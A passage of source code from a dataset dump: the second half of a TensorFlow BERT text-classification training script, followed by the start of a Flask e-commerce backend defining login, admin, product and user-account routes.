checkpoint.\")\nflags.DEFINE_integer(\"iterations_per_loop\", 1000, \"How many steps to make in each estimator call.\")\n\nflags.DEFINE_bool(\"use_tpu\", False, \"Whether to use TPU or GPU/CPU.\")\nflags.DEFINE_integer(\"num_tpu_cores\", 8,\"Only used if `use_tpu` is True. Total number of TPU cores to use.\")\nflags.DEFINE_string(\"master\", None, \"[Optional] TensorFlow master URL.\")\n\nflags.DEFINE_string(\n \"tpu_name\", None,\n \"The Cloud TPU to use for training. This should be either the name \"\n \"used when creating the Cloud TPU, or a grpc://ip.address.of.tpu:8470 url.\")\n\nflags.DEFINE_string(\n \"tpu_zone\", None,\n \"[Optional] GCE zone where the Cloud TPU is located in. If not \"\n \"specified, we will attempt to automatically detect the GCE project from metadata.\")\n\nflags.DEFINE_string(\n \"gcp_project\", None,\n \"[Optional] Project name for the Cloud TPU-enabled project. If not \"\n \"specified, we will attempt to automatically detect the GCE project from metadata.\")\n\nclass InputExample(object):\n \"\"\"A single training/test example for simple sequence classification.\"\"\"\n def __init__(self,\n guid,\n text,\n sent_label=None):\n \"\"\"Constructs a InputExample.\n\n Args:\n guid: Unique id for the example.\n text: string. The untokenized text of the first sequence. For single\n sequence tasks, only this sequence must be specified.\n sent_label: (Optional) string. The sentence label of the example. This should be\n specified for train and dev examples, but not for test examples.\n \"\"\"\n self.guid = guid\n self.text = text\n self.sent_label = sent_label\n\nclass PaddingInputExample(object):\n \"\"\"Fake example so the num input examples is a multiple of the batch size.\n \n When running eval/predict on the TPU, we need to pad the number of examples\n to be a multiple of the batch size, because the TPU requires a fixed batch\n size. 
The alternative is to drop the last batch, which is bad because it means\n the entire output data won't be generated.\n \n We use this class instead of `None` because treating `None` as padding\n battches could cause silent errors.\n \"\"\"\n\nclass InputFeatures(object):\n \"\"\"A single set of features of data.\"\"\"\n def __init__(self,\n input_ids,\n input_masks,\n segment_ids,\n sent_label_id):\n self.input_ids = input_ids\n self.input_masks = input_masks\n self.segment_ids = segment_ids\n self.sent_label_id = sent_label_id\n\nclass ClassificationProcessor(object):\n \"\"\"Processor for the classification data set.\"\"\"\n def __init__(self,\n data_dir,\n task_name):\n self.data_dir = data_dir\n self.task_name = task_name\n \n def get_train_examples(self):\n \"\"\"Gets a collection of `InputExample`s for the train set.\"\"\"\n data_path = os.path.join(self.data_dir, \"train-{0}\".format(self.task_name), \"train-{0}.json\".format(self.task_name))\n data_list = self._read_json(data_path)\n example_list = self._get_example(data_list)\n return example_list\n \n def get_dev_examples(self):\n \"\"\"Gets a collection of `InputExample`s for the dev set.\"\"\"\n data_path = os.path.join(self.data_dir, \"dev-{0}\".format(self.task_name), \"dev-{0}.json\".format(self.task_name))\n data_list = self._read_json(data_path)\n example_list = self._get_example(data_list)\n return example_list\n \n def get_test_examples(self):\n \"\"\"Gets a collection of `InputExample`s for the test set.\"\"\"\n data_path = os.path.join(self.data_dir, \"test-{0}\".format(self.task_name), \"test-{0}.json\".format(self.task_name))\n data_list = self._read_json(data_path)\n example_list = self._get_example(data_list)\n return example_list\n \n def get_sent_labels(self):\n \"\"\"Gets the list of sentence labels for this data set.\"\"\"\n data_path = os.path.join(self.data_dir, \"resource\", \"sent_label.vocab\")\n sent_labels = self._read_text(data_path)\n return sent_labels\n \n def _read_text(self,\n data_path):\n if os.path.exists(data_path):\n with open(data_path, \"rb\") as file:\n data_list = []\n for line in file:\n data_list.append(line.decode(\"utf-8\").strip())\n\n return data_list\n else:\n raise FileNotFoundError(\"data path not found\")\n \n def _read_json(self,\n data_path):\n if os.path.exists(data_path):\n with open(data_path, \"r\") as file:\n data_list = json.load(file)\n return data_list\n else:\n raise FileNotFoundError(\"data path not found\")\n \n def _get_example(self,\n data_list):\n example_list = []\n for data in data_list:\n guid = data[\"id\"]\n text = tokenization.convert_to_unicode(data[\"text\"])\n sent_label = tokenization.convert_to_unicode(data[\"sent_label\"])\n example = InputExample(guid=guid, text=text, sent_label=sent_label)\n example_list.append(example)\n \n return example_list\n\ndef convert_single_example(ex_index,\n example,\n sent_label_list,\n max_seq_length,\n tokenizer):\n \"\"\"Converts a single `InputExample` into a single `InputFeatures`.\"\"\"\n if isinstance(example, PaddingInputExample):\n return InputFeatures(\n input_ids=[0] * max_seq_length,\n input_masks=[0] * max_seq_length,\n segment_ids=[0] * max_seq_length,\n sent_label_id=0)\n \n sent_label_map = {}\n for (i, sent_label) in enumerate(sent_label_list):\n sent_label_map[sent_label] = i\n \n tokens = tokenizer.tokenize(example.text)\n \n if len(tokens) > max_seq_length - 2:\n tokens = tokens[0:(max_seq_length - 2)]\n \n # The convention in BERT is:\n # (a) For sequence pairs:\n # tokens: [CLS] is this jack ##son 
##ville ? [SEP] no it is not . [SEP]\n # type_ids: 0 0 0 0 0 0 0 0 1 1 1 1 1 1\n # (b) For single sequences:\n # tokens: [CLS] the dog is hairy . [SEP]\n # type_ids: 0 0 0 0 0 0 0\n #\n # Where \"type_ids\" are used to indicate whether this is the first\n # sequence or the second sequence. The embedding vectors for `type=0` and\n # `type=1` were learned during pre-training and are added to the wordpiece\n # embedding vector (and position vector). This is not *strictly* necessary\n # since the [SEP] token unambiguously separates the sequences, but it makes\n # it easier for the model to learn the concept of sequences.\n #\n # For classification tasks, the first vector (corresponding to [CLS]) is\n # used as the \"sentence vector\". Note that this only makes sense because\n # the entire model is fine-tuned.\n \n input_tokens = []\n segment_ids = []\n sent_label_id = sent_label_map[example.sent_label]\n \n input_tokens.append(\"[CLS]\")\n segment_ids.append(0)\n \n for token in tokens:\n input_tokens.append(token)\n segment_ids.append(0)\n \n input_tokens.append(\"[SEP]\")\n segment_ids.append(0)\n \n input_ids = tokenizer.convert_tokens_to_ids(input_tokens)\n \n # The mask has 1 for real tokens and 0 for padding tokens. Only real tokens are attended to.\n input_masks = [1] * len(input_ids)\n \n # Zero-pad up to the sequence length.\n while len(input_ids) < max_seq_length:\n input_ids.append(0)\n input_masks.append(0)\n segment_ids.append(0)\n\n assert len(input_ids) == max_seq_length\n assert len(input_masks) == max_seq_length\n assert len(segment_ids) == max_seq_length\n \n if ex_index < 5:\n tf.logging.info(\"*** Example ***\")\n tf.logging.info(\"guid: %s\" % (example.guid))\n tf.logging.info(\"tokens: %s\" % \" \".join([tokenization.printable_text(x) for x in tokens]))\n tf.logging.info(\"input_ids: %s\" % \" \".join([str(x) for x in input_ids]))\n tf.logging.info(\"input_masks: %s\" % \" \".join([str(x) for x in input_masks]))\n tf.logging.info(\"segment_ids: %s\" % \" \".join([str(x) for x in segment_ids]))\n tf.logging.info(\"sent_label_id: %s\" % str(sent_label_id))\n\n feature = InputFeatures(\n input_ids=input_ids,\n input_masks=input_masks,\n segment_ids=segment_ids,\n sent_label_id=sent_label_id)\n return feature\n\ndef convert_examples_to_features(examples,\n sent_label_list,\n max_seq_length,\n tokenizer):\n \"\"\"Convert a set of `InputExample`s to a list of `InputFeatures`.\"\"\"\n features = []\n for (ex_index, example) in enumerate(examples):\n if ex_index % 10000 == 0:\n tf.logging.info(\"Writing example %d of %d\" % (ex_index, len(examples)))\n \n feature = convert_single_example(ex_index, example, sent_label_list, max_seq_length, tokenizer)\n features.append(feature)\n \n return features\n\ndef input_fn_builder(features,\n seq_length,\n is_training,\n drop_remainder):\n \"\"\"Creates an `input_fn` closure to be passed to TPUEstimator.\"\"\"\n all_input_ids = []\n all_input_masks = []\n all_segment_ids = []\n all_sent_label_ids = []\n \n for feature in features:\n all_input_ids.append(feature.input_ids)\n all_input_masks.append(feature.input_masks)\n all_segment_ids.append(feature.segment_ids)\n all_sent_label_ids.append(feature.sent_label_id)\n \n def input_fn(params):\n batch_size = params[\"batch_size\"]\n num_examples = len(features)\n\n # This is for demo purposes and does NOT scale to large data sets. We do\n # not use Dataset.from_generator() because that uses tf.py_func which is\n # not TPU compatible. 
The right way to load data is with TFRecordReader.\n d = tf.data.Dataset.from_tensor_slices({\n \"input_ids\": tf.constant(all_input_ids, shape=[num_examples, seq_length], dtype=tf.int32),\n \"input_masks\": tf.constant(all_input_masks, shape=[num_examples, seq_length], dtype=tf.int32),\n \"segment_ids\": tf.constant(all_segment_ids, shape=[num_examples, seq_length], dtype=tf.int32),\n \"sent_label_ids\": tf.constant(all_sent_label_ids, shape=[num_examples], dtype=tf.int32),\n })\n \n if is_training:\n d = d.repeat()\n d = d.shuffle(buffer_size=100, seed=np.random.randint(10000))\n \n d = d.batch(batch_size=batch_size, drop_remainder=drop_remainder)\n return d\n \n return input_fn\n\ndef file_based_convert_examples_to_features(examples,\n sent_label_list,\n max_seq_length,\n tokenizer,\n output_file):\n \"\"\"Convert a set of `InputExample`s to a TFRecord file.\"\"\"\n def create_int_feature(values):\n return tf.train.Feature(int64_list=tf.train.Int64List(value=list(values)))\n \n writer = tf.python_io.TFRecordWriter(output_file)\n \n for (ex_index, example) in enumerate(examples):\n if ex_index % 10000 == 0:\n tf.logging.info(\"Writing example %d of %d\" % (ex_index, len(examples)))\n \n feature = convert_single_example(ex_index, example, sent_label_list, max_seq_length, tokenizer)\n \n features = collections.OrderedDict()\n features[\"input_ids\"] = create_int_feature(feature.input_ids)\n features[\"input_masks\"] = create_int_feature(feature.input_masks)\n features[\"segment_ids\"] = create_int_feature(feature.segment_ids)\n features[\"sent_label_ids\"] = create_int_feature([feature.sent_label_id])\n \n tf_example = tf.train.Example(features=tf.train.Features(feature=features))\n \n writer.write(tf_example.SerializeToString())\n \n writer.close()\n\ndef file_based_input_fn_builder(input_file,\n seq_length,\n is_training,\n drop_remainder):\n \"\"\"Creates an `input_fn` closure to be passed to TPUEstimator.\"\"\"\n name_to_features = {\n \"input_ids\": tf.FixedLenFeature([seq_length], tf.int64),\n \"input_masks\": tf.FixedLenFeature([seq_length], tf.int64),\n \"segment_ids\": tf.FixedLenFeature([seq_length], tf.int64),\n \"sent_label_ids\": tf.FixedLenFeature([], tf.int64),\n }\n \n def _decode_record(record,\n name_to_features):\n \"\"\"Decodes a record to a TensorFlow example.\"\"\"\n example = tf.parse_single_example(record, name_to_features)\n \n # tf.Example only supports tf.int64, but the TPU only supports tf.int32. 
So cast all int64 to int32.\n for name in list(example.keys()):\n t = example[name]\n if t.dtype == tf.int64:\n t = tf.to_int32(t)\n example[name] = t\n \n return example\n \n def input_fn(params):\n \"\"\"The actual input function.\"\"\"\n batch_size = params[\"batch_size\"]\n \n # For training, we want a lot of parallel reading and shuffling.\n # For eval, we want no shuffling and parallel reading doesn't matter.\n d = tf.data.TFRecordDataset(input_file)\n \n if is_training:\n d = d.repeat()\n d = d.shuffle(buffer_size=100, seed=np.random.randint(10000))\n \n d = d.apply(tf.contrib.data.map_and_batch(\n lambda record: _decode_record(record, name_to_features),\n batch_size=batch_size,\n drop_remainder=drop_remainder))\n \n return d\n \n return input_fn\n\ndef create_model(bert_config,\n input_ids,\n input_masks,\n segment_ids,\n sent_label_ids,\n sent_label_list,\n mode,\n use_tpu):\n \"\"\"Creates a Classifier model.\"\"\"\n is_training = (mode == tf.estimator.ModeKeys.TRAIN)\n model = modeling.BertModel(\n config=bert_config,\n is_training=is_training,\n input_ids=input_ids,\n input_mask=input_masks,\n token_type_ids=segment_ids,\n use_one_hot_embeddings=use_tpu)\n \n # If you want to use sentence-level output, use model.get_pooled_output()\n # If you want to use token-level output, use model.get_sequence_output()\n with tf.variable_scope(\"sent\", reuse=tf.AUTO_REUSE):\n sent_result = model.get_pooled_output()\n sent_result_mask = tf.cast(tf.reduce_max(input_masks, axis=-1, keepdims=True), dtype=tf.float32)\n \n sent_kernel_initializer = tf.glorot_uniform_initializer(seed=np.random.randint(10000), dtype=tf.float32)\n sent_bias_initializer = tf.zeros_initializer\n sent_dense_layer = tf.keras.layers.Dense(units=len(sent_label_list), activation=None, use_bias=True,\n kernel_initializer=sent_kernel_initializer, bias_initializer=sent_bias_initializer,\n kernel_regularizer=None, bias_regularizer=None, trainable=True)\n \n sent_dropout_layer = tf.keras.layers.Dropout(rate=0.1, seed=np.random.randint(10000))\n \n sent_result = sent_dense_layer(sent_result)\n if mode == tf.estimator.ModeKeys.TRAIN:\n sent_result = sent_dropout_layer(sent_result)\n \n masked_sent_predict = sent_result * sent_result_mask + MIN_FLOAT * (1 - sent_result_mask)\n sent_predict_probs = tf.nn.softmax(masked_sent_predict, axis=-1)\n sent_predict_ids = tf.cast(tf.argmax(sent_predict_probs, axis=-1), dtype=tf.int32)\n sent_predict_scores = tf.reduce_max(sent_predict_probs, axis=-1)\n \n loss = tf.constant(0.0, dtype=tf.float32)\n if mode not in [tf.estimator.ModeKeys.TRAIN, tf.estimator.ModeKeys.EVAL]:\n return loss, sent_predict_ids, sent_predict_scores, sent_predict_probs\n \n if sent_label_ids is not None:\n with tf.variable_scope(\"sent_loss\", reuse=tf.AUTO_REUSE):\n sent_label = tf.cast(sent_label_ids, dtype=tf.float32)\n sent_label_mask = tf.cast(tf.reduce_max(input_masks, axis=-1), dtype=tf.float32)\n masked_sent_label = tf.cast(sent_label * sent_label_mask, dtype=tf.int32)\n sent_cross_entropy = tf.nn.sparse_softmax_cross_entropy_with_logits(labels=masked_sent_label, logits=masked_sent_predict)\n sent_loss = tf.reduce_sum(sent_cross_entropy * sent_label_mask) / tf.reduce_sum(tf.reduce_max(sent_label_mask, axis=-1))\n loss = loss + sent_loss\n \n return loss, sent_predict_ids, sent_predict_scores, sent_predict_probs\n\ndef model_fn_builder(bert_config,\n sent_label_list,\n init_checkpoint,\n learning_rate,\n num_train_steps,\n num_warmup_steps,\n use_tpu):\n \"\"\"Returns `model_fn` closure for 
TPUEstimator.\"\"\"\n def model_fn(features,\n labels,\n mode,\n params): # pylint: disable=unused-argument\n \"\"\"The `model_fn` for TPUEstimator.\"\"\"\n tf.logging.info(\"*** Features ***\")\n for name in sorted(features.keys()):\n tf.logging.info(\" name = %s, shape = %s\" % (name, features[name].shape))\n \n input_ids = features[\"input_ids\"]\n input_masks = features[\"input_masks\"]\n segment_ids = features[\"segment_ids\"]\n sent_label_ids = features[\"sent_label_ids\"] if mode in [tf.estimator.ModeKeys.TRAIN, tf.estimator.ModeKeys.EVAL] else None\n \n loss, sent_predict_ids, sent_predict_scores, sent_predict_probs = create_model(bert_config,\n input_ids, input_masks, segment_ids, sent_label_ids, sent_label_list, mode, use_tpu)\n \n tvars = tf.trainable_variables()\n initialized_variable_names = {}\n scaffold_fn = None\n \n if init_checkpoint:\n assignment_map, initialized_variable_names = modeling.get_assignment_map_from_checkpoint(tvars, init_checkpoint)\n \n if use_tpu:\n def tpu_scaffold():\n tf.train.init_from_checkpoint(init_checkpoint, assignment_map)\n return tf.train.Scaffold()\n \n scaffold_fn = tpu_scaffold\n else:\n tf.train.init_from_checkpoint(init_checkpoint, assignment_map)\n \n tf.logging.info(\"**** Trainable Variables ****\")\n for var in tvars:\n init_string = \"\"\n if var.name in initialized_variable_names:\n init_string = \", *INIT_FROM_CKPT*\"\n \n tf.logging.info(\" name = %s, shape = %s%s\", var.name, var.shape, init_string)\n \n output_spec = None \n if mode == tf.estimator.ModeKeys.TRAIN:\n train_op = optimization.create_optimizer(loss, learning_rate, num_train_steps, num_warmup_steps, use_tpu)\n output_spec = tf.contrib.tpu.TPUEstimatorSpec(\n mode=mode,\n loss=loss,\n train_op=train_op,\n scaffold_fn=scaffold_fn)\n elif mode == tf.estimator.ModeKeys.EVAL:\n def metric_fn(sent_label_ids,\n sent_predict_ids):\n sent_accuracy = tf.metrics.accuracy(labels=sent_label_ids, predictions=sent_predict_ids)\n \n metric = {\n \"sent_accuracy\": sent_accuracy,\n }\n \n return metric\n \n eval_metrics = (metric_fn, [sent_label_ids, sent_predict_ids])\n output_spec = tf.contrib.tpu.TPUEstimatorSpec(\n mode=mode,\n loss=loss,\n eval_metrics=eval_metrics,\n scaffold_fn=scaffold_fn)\n else:\n output_spec = tf.contrib.tpu.TPUEstimatorSpec(\n mode=mode,\n predictions={\n \"sent_predict_id\": sent_predict_ids,\n \"sent_predict_score\": sent_predict_scores,\n \"sent_predict_prob\": sent_predict_probs\n },\n scaffold_fn=scaffold_fn)\n \n return output_spec\n \n return model_fn\n\ndef get_masked_data(data_ids,\n label_list):\n label_map = {}\n for (i, label) in enumerate(label_list):\n label_map[label] = i\n\n pad_id = tf.constant(label_map[\"[PAD]\"], shape=[], dtype=tf.int32)\n out_id = tf.constant(label_map[\"O\"], shape=[], dtype=tf.int32)\n x_id = tf.constant(label_map[\"X\"], shape=[], dtype=tf.int32)\n cls_id = tf.constant(label_map[\"[CLS]\"], shape=[], dtype=tf.int32)\n sep_id = tf.constant(label_map[\"[SEP]\"], shape=[], dtype=tf.int32)\n\n masked_data_ids = (tf.cast(tf.not_equal(data_ids, pad_id), dtype=tf.int32) *\n tf.cast(tf.not_equal(data_ids, out_id), dtype=tf.int32) *\n tf.cast(tf.not_equal(data_ids, x_id), dtype=tf.int32) *\n tf.cast(tf.not_equal(data_ids, cls_id), dtype=tf.int32) *\n tf.cast(tf.not_equal(data_ids, sep_id), dtype=tf.int32))\n \n return masked_data_ids\n\ndef serving_input_fn():\n with tf.variable_scope(\"export\"):\n features = {\n 'input_ids': tf.placeholder(tf.int32, [None, FLAGS.max_seq_length], name='input_ids'),\n 'input_masks': 
tf.placeholder(tf.int32, [None, FLAGS.max_seq_length], name='input_masks'),\n 'segment_ids': tf.placeholder(tf.int32, [None, FLAGS.max_seq_length], name='segment_ids')\n }\n \n return tf.estimator.export.build_raw_serving_input_receiver_fn(features)()\n\ndef decode_predicts(predicts,\n sent_label_list,\n max_seq_length,\n tokenizer):\n decoded_predicts = []\n for predict in predicts:\n input_tokens = tokenizer.convert_ids_to_tokens(predict[\"input_ids\"])\n input_masks = predict[\"input_masks\"]\n \n decoded_tokens = []\n for input_token, input_mask in zip(input_tokens, input_masks):\n if input_mask == 0:\n break\n \n if input_token in [\"[CLS]\", \"[SEP]\"]:\n continue\n \n if input_token[:2] == \"##\":\n decoded_tokens[-1] = decoded_tokens[-1] + input_token[2:]\n continue\n \n decoded_tokens.append(input_token)\n \n decoded_predict = {\n \"text\": \" \".join(decoded_tokens),\n \"sent_label\": sent_label_list[predict[\"sent_label_id\"]],\n \"sent_predict\": sent_label_list[predict[\"sent_predict_id\"]],\n \"sent_score\": float(predict[\"sent_predict_score\"]),\n \"sent_probs\": [float(prob) for prob in predict[\"sent_predict_prob\"]]\n }\n \n decoded_predicts.append(decoded_predict)\n \n return decoded_predicts\n\ndef write_to_json(data_list,\n data_path):\n data_folder = os.path.dirname(data_path)\n if not os.path.exists(data_folder):\n os.mkdir(data_folder)\n \n with open(data_path, \"w\") as file: \n json.dump(data_list, file, indent=4)\n\ndef write_to_text(data_list,\n data_path):\n data_folder = os.path.dirname(data_path)\n if not os.path.exists(data_folder):\n os.mkdir(data_folder)\n \n with open(data_path, \"w\") as file:\n for data in data_list:\n file.write(\"{0}\\n\".format(data))\n\ndef main(_):\n tf.logging.set_verbosity(tf.logging.INFO)\n \n np.random.seed(FLAGS.random_seed)\n \n bert_config = modeling.BertConfig.from_json_file(FLAGS.bert_config_file)\n \n if FLAGS.max_seq_length > bert_config.max_position_embeddings:\n raise ValueError(\"Cannot use sequence length %d because the BERT model was only trained up to sequence length %d\" %\n (FLAGS.max_seq_length, bert_config.max_position_embeddings))\n \n tf.gfile.MakeDirs(FLAGS.output_dir)\n \n tokenization.validate_case_matches_checkpoint(FLAGS.do_lower_case, FLAGS.init_checkpoint)\n tokenizer = tokenization.FullTokenizer(vocab_file=FLAGS.vocab_file, do_lower_case=FLAGS.do_lower_case)\n \n data_dir = FLAGS.data_dir\n task_name = FLAGS.task_name.lower()\n processor = ClassificationProcessor(data_dir, task_name)\n sent_label_list = processor.get_sent_labels()\n \n train_examples = None\n num_train_steps = None\n num_warmup_steps = None\n if FLAGS.do_train:\n train_examples = processor.get_train_examples()\n num_train_steps = int(len(train_examples) / FLAGS.train_batch_size * FLAGS.num_train_epochs)\n num_warmup_steps = int(num_train_steps * FLAGS.warmup_proportion)\n \n tpu_cluster_resolver = None\n if FLAGS.use_tpu and FLAGS.tpu_name:\n tpu_cluster_resolver = tf.contrib.cluster_resolver.TPUClusterResolver(\n FLAGS.tpu_name, zone=FLAGS.tpu_zone, project=FLAGS.gcp_project)\n \n is_per_host = tf.contrib.tpu.InputPipelineConfig.PER_HOST_V2\n run_config = tf.contrib.tpu.RunConfig(\n cluster=tpu_cluster_resolver,\n master=FLAGS.master,\n model_dir=FLAGS.output_dir,\n save_checkpoints_steps=FLAGS.save_checkpoints_steps,\n tpu_config=tf.contrib.tpu.TPUConfig(\n iterations_per_loop=FLAGS.iterations_per_loop,\n num_shards=FLAGS.num_tpu_cores,\n per_host_input_for_training=is_per_host))\n \n model_fn = model_fn_builder(\n 
bert_config=bert_config,\n sent_label_list=sent_label_list,\n init_checkpoint=FLAGS.init_checkpoint,\n learning_rate=FLAGS.learning_rate,\n num_train_steps=num_train_steps,\n num_warmup_steps=num_warmup_steps,\n use_tpu=FLAGS.use_tpu)\n \n # If TPU is not available, this will fall back to normal Estimator on CPU or GPU.\n estimator = tf.contrib.tpu.TPUEstimator(\n use_tpu=FLAGS.use_tpu,\n model_fn=model_fn,\n config=run_config,\n export_to_tpu=FLAGS.use_tpu,\n train_batch_size=FLAGS.train_batch_size,\n eval_batch_size=FLAGS.eval_batch_size,\n predict_batch_size=FLAGS.predict_batch_size)\n \n if FLAGS.do_train:\n tf.logging.info(\"***** Run training *****\")\n tf.logging.info(\" Num examples = %d\", len(train_examples))\n tf.logging.info(\" Batch size = %d\", FLAGS.train_batch_size)\n tf.logging.info(\" Num steps = %d\", num_train_steps)\n \n train_features = convert_examples_to_features(\n examples=train_examples,\n sent_label_list=sent_label_list,\n max_seq_length=FLAGS.max_seq_length,\n tokenizer=tokenizer)\n\n train_input_fn = input_fn_builder(\n features=train_features,\n seq_length=FLAGS.max_seq_length,\n is_training=True,\n drop_remainder=True)\n \n estimator.train(input_fn=train_input_fn, max_steps=num_train_steps)\n \n if FLAGS.do_eval:\n eval_examples = processor.get_dev_examples()\n tf.logging.info(\"***** Run evaluation *****\")\n tf.logging.info(\" Num examples = %d\", len(eval_examples))\n tf.logging.info(\" Batch size = %d\", FLAGS.eval_batch_size)\n \n eval_features = convert_examples_to_features(\n examples=eval_examples,\n sent_label_list=sent_label_list,\n max_seq_length=FLAGS.max_seq_length,\n tokenizer=tokenizer)\n\n eval_input_fn = input_fn_builder(\n features=eval_features,\n seq_length=FLAGS.max_seq_length,\n is_training=False,\n drop_remainder=False)\n \n result = estimator.evaluate(input_fn=eval_input_fn)\n \n sent_accuracy = result[\"sent_accuracy\"]\n \n tf.logging.info(\"***** Evaluation result *****\")\n tf.logging.info(\" Accuracy (sent-level) = %s\", str(sent_accuracy))\n \n if FLAGS.do_predict:\n predict_examples = processor.get_test_examples()\n tf.logging.info(\"***** Run prediction *****\")\n tf.logging.info(\" Num examples = %d\", len(predict_examples))\n tf.logging.info(\" Batch size = %d\", FLAGS.predict_batch_size)\n \n predict_features = convert_examples_to_features(\n examples=predict_examples,\n sent_label_list=sent_label_list,\n max_seq_length=FLAGS.max_seq_length,\n tokenizer=tokenizer)\n\n predict_input_fn = input_fn_builder(\n features=predict_features,\n seq_length=FLAGS.max_seq_length,\n is_training=False,\n drop_remainder=False)\n \n result = estimator.predict(input_fn=predict_input_fn)\n \n predicts = [{\n \"input_ids\": feature.input_ids,\n \"input_masks\": feature.input_masks,\n \"sent_label_id\": feature.sent_label_id,\n \"sent_predict_id\": predict[\"sent_predict_id\"],\n \"sent_predict_score\": predict[\"sent_predict_score\"],\n \"sent_predict_prob\": predict[\"sent_predict_prob\"].tolist()\n } for feature, predict in zip(predict_features, result)]\n \n decoded_predicts = decode_predicts(\n predicts=predicts,\n sent_label_list=sent_label_list,\n max_seq_length=FLAGS.max_seq_length,\n tokenizer=tokenizer)\n \n predict_tag = FLAGS.predict_tag if FLAGS.predict_tag else str(time.time())\n output_path = os.path.join(FLAGS.output_dir, \"predict.{0}.json\".format(predict_tag))\n write_to_json(decoded_predicts, output_path)\n \n if FLAGS.do_export:\n tf.logging.info(\"***** Running exporting *****\")\n tf.gfile.MakeDirs(FLAGS.export_dir)\n 
estimator.export_savedmodel(FLAGS.export_dir, serving_input_fn, as_text=False)\n\nif __name__ == \"__main__\":\n flags.mark_flag_as_required(\"bert_config_file\")\n flags.mark_flag_as_required(\"vocab_file\")\n flags.mark_flag_as_required(\"init_checkpoint\")\n flags.mark_flag_as_required(\"data_dir\")\n flags.mark_flag_as_required(\"output_dir\")\n flags.mark_flag_as_required(\"export_dir\")\n tf.app.run()\n","sub_path":"run_classifier.py","file_name":"run_classifier.py","file_ext":"py","file_size_in_byte":32859,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"402705504","text":"from json import dumps\nfrom flask import Flask, request\nfrom flask_cors import CORS\nfrom auth import *\nfrom app import *\nfrom auth_admin import *\nfrom product import *\nfrom user_function import *\nfrom purchase import *\nfrom cart import *\nfrom recommend import *\nfrom search import *\nfrom chat import *\n#----------------------------------------------user login-------------------------------\n@app.route('/login', methods=['POST'])\ndef flask_login():\n j = request.json\n email = j['email']\n password = j['password']\n l = user_login(email, password)\n return dumps(l)\n\n\n@app.route('/register', methods=['POST'])\ndef flask_register():\n j = request.json\n email = j['email']\n password = j['password']\n name = j['name']\n l = user_register(email, password, name)\n return dumps(l)\n\n\n@app.route('/logout', methods=['POST'])\ndef flask_logout():\n j = request.json\n t = j['token']\n l = user_logout(t)\n return dumps(l)\n\n#----------------------------------------------admin login-------------------------------\n@app.route('/admin_login', methods=['POST'])\ndef flask_admin_login():\n j = request.json\n email = j['email']\n password = j['password']\n l = admin_login(email, password)\n return dumps(l)\n\n@app.route('/admin_logout', methods=['POST'])\ndef flask_admin_logout():\n j = request.json\n token = j['Admin']\n l = admin_logout(token)\n return dumps(l)\n\n@app.route('/admin_product', methods=['GET'])\ndef flask_admin_product():\n token = request.headers.get('Admin',None)\n l = admin_product(token)\n return dumps(l)\n\n@app.route('/admin_order', methods=['GET'])\ndef flask_admin_order():\n token = request.headers.get('Admin',None)\n l = admin_order(token)\n return dumps(l)\n\n\n@app.route('/admin_get_order', methods=['GET'])\ndef flask_admin_get_order():\n token = request.headers.get('Admin',None)\n index = request.headers.get('index',None)\n l=admin_get_order(token,index)\n return dumps(l)\n\n#----------------------------------------------product-------------------------------\n\n \n@app.route('/add_product', methods=['POST'])\ndef flask_add_product():\n j = request.json\n token = request.headers.get('Admin',None)\n category_id = j['category_id']\n name = j['name']\n detail = j['detail']\n price = j['price']\n stock = j['stock']\n tag=j['tag']\n first_p=j['first_p']\n second_p=j['second_p']\n l = add_product(token,category_id,name,detail,price,stock,tag,first_p,second_p)\n return dumps(l)\n\n@app.route('/delete_product/', methods=['PUT'])\ndef flask_delete_product(id):\n id=int(id)\n token = request.headers.get('Authorization',None)\n l=delete_product(token,id)\n return dumps(l)\n\n@app.route('/update_information', methods=['POST'])\ndef flask_update_information():\n j = request.json\n token = request.headers.get('Admin',None)\n id=j['id']\n category_id = j['category_id']\n name = j['name']\n detail = j['detail']\n price = j['price']\n stock = 
j['stock']\n tag=j['tag']\n first_p=j['first_p']\n second_p=j['second_p']\n l = update_information(token,id,category_id,name,detail,price,stock,tag,first_p,second_p)\n return dumps(l)\n\n\n@app.route('/change_detail', methods=['PUT'])\ndef flask_change_detail():\n j = request.json\n token = request.args.get(\"token\")\n id = request.args.get(\"id\")\n detail = j['detail']\n l = chang_detail(token, id, detail)\n return dumps(l)\n\n@app.route('/add_tag', methods=['PUT'])\ndef flask_add_tag():\n j = request.json\n token = request.args.get(\"token\")\n id = request.args.get(\"id\")\n tag = j['tag']\n l = add_tag(token, id, tag)\n return dumps(l)\n\n@app.route('/change_tag', methods=['PUT'])\ndef flask_change_tag():\n j = request.json\n token = request.args.get(\"token\")\n id = request.args.get(\"id\")\n tag = j['tag']\n l = change_tag(token, id, tag)\n return dumps(l)\n\n@app.route('/change_status', methods=['PUT'])\ndef flask_change_status():\n j = request.json\n token = request.args.get(\"token\")\n id = request.args.get(\"id\")\n status = j['status']\n l = change_status(token, id, status)\n return dumps(l)\n\n@app.route('/change_stock', methods=['PUT'])\ndef flask_change_stock():\n j = request.json\n token = request.args.get(\"token\")\n id = request.args.get(\"id\")\n stock= j['stock']\n l = change_stock(token, id, stock)\n return dumps(l)\n\n@app.route('/change_price', methods=['PUT'])\ndef flask_change_price():\n j = request.json\n token = request.args.get(\"token\")\n id = request.args.get(\"id\")\n price = j['price']\n l = change_stock(token, id, price)\n return dumps(l)\n\n@app.route('/get_product/', methods=['GET'])\ndef flask_get_product(category):\n return dumps(get_by_category(category))\n\n@app.route('/get_number/', methods=['GET'])\ndef flask_get_number(category):\n return dumps(get_number_by_category(category))\n\n@app.route('/get_one_product/', methods=['GET'])\ndef flask_get_one_product(id):\n id=int(id)\n return dumps(get_one_product(id))\n\n\n@app.route('/update_first_photo', methods=['PUT'])\ndef flask_update_first_photo():\n j = request.json\n id = request.args.get(\"id\")\n token = request.args.get(\"token\")\n photo = j['photo']\n return dumps(update_first_photo(photo))\n\n@app.route('/update_second_photo', methods=['PUT'])\ndef flask_update_second_photo():\n j = request.json\n id = request.args.get(\"id\")\n token = request.args.get(\"token\")\n photo = j['photo']\n return dumps(update_second_photo(photo))\n#----------------------------------------------user function-------------------------------\n\n@app.route('/change_password', methods=['PUT'])\ndef flask_change_password():\n j = request.json\n token = request.headers.get('Authorization',None)\n password = j['password']\n current_password = j['current_password']\n l = change_password(token,current_password, password)\n return dumps(l)\n\n\n@app.route('/change_name', methods=['PUT'])\ndef flask_change_name():\n j = request.json\n token = request.headers.get('Authorization',None)\n name = j['name']\n l = change_name(token,name)\n return 